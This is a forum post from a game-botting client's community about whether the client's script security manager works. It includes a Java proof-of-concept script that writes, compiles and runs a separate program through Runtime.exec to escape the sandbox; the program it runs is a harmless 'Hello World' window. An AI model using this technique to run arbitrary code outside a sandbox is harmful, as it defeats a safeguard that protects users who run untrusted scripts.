Jump to content

Security manager discussion


Nbacon

Recommended Posts

1 hour ago, Malcolm said:

There is no need for anyone to access anything outside of that osbot directory 

I 100% agree that sciprts with unknow code should be sandboxed. 

1 hour ago, Malcolm said:

you’re not able to execute new runtimes afaik.

So yes you can make and run code out side of osbot.(example below) You can also read files out side of the osbot folder but not write to them(kinda dumb but ok). 

Quote

@ScriptManifest(author = "Bacon", name = "MAYBEmalicious", info = "malicious", version = 0.0, logo = "")
public class Test1 extends Script {

    @Override
    public void onStart() throws InterruptedException {
        try {
            File file = new File(getDirectoryData() + "/Main.java");
            BufferedWriter output = new BufferedWriter(new FileWriter(file));
            output.write(
                    "import javax.swing.*;\n" +
                            "import java.awt.*;\n" +
                            "\n" +
                            "public class Main{\n" +
                            "\n" +
                            "    public static void main(String[] args) {\n" +
                            "\n" +
                            "        JFrame frame = new JFrame(\"FrameDemo\");\n" +
                            "        frame.setMinimumSize(new Dimension(800, 400));\n" +
                            "        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);       \n" +
                            "\n" +
                            "        JLabel myLabel = new JLabel(\"Hello World !!!\", SwingConstants.CENTER);\n" +
                            "        myLabel.setFont(new Font(\"Serif\", Font.BOLD, 22));\n" +
                            "        myLabel.setBackground(Color.blue);\n" +
                            "        myLabel.setOpaque(true);\n" +
                            "        myLabel.setPreferredSize(new Dimension(100, 80));\n" +
                            "\n" +
                            "        frame.getContentPane().add(myLabel, BorderLayout.NORTH);\n" +
                            "        frame.pack();\n" +
                            "\n" +
                            "        frame.setVisible(true);\n" +
                            "    }\n" +
                            "}");

            output.close();
            Thread.sleep(1000);
            Runtime.getRuntime().exec("javac " + getDirectoryData() + "/Main.java");
            Thread.sleep(1000);

            Runtime.getRuntime().exec("java -cp " + getDirectoryData() + " Main");

        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public int onLoop() throws InterruptedException {
        
        stop();
        return 100000;
    }
}

 

For me It seems like more of an annoyance than a safety measure because it can be "easy*" bypassed.

 

 

Ps congrats on super mod

*Dumb workarounds

  • Like 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...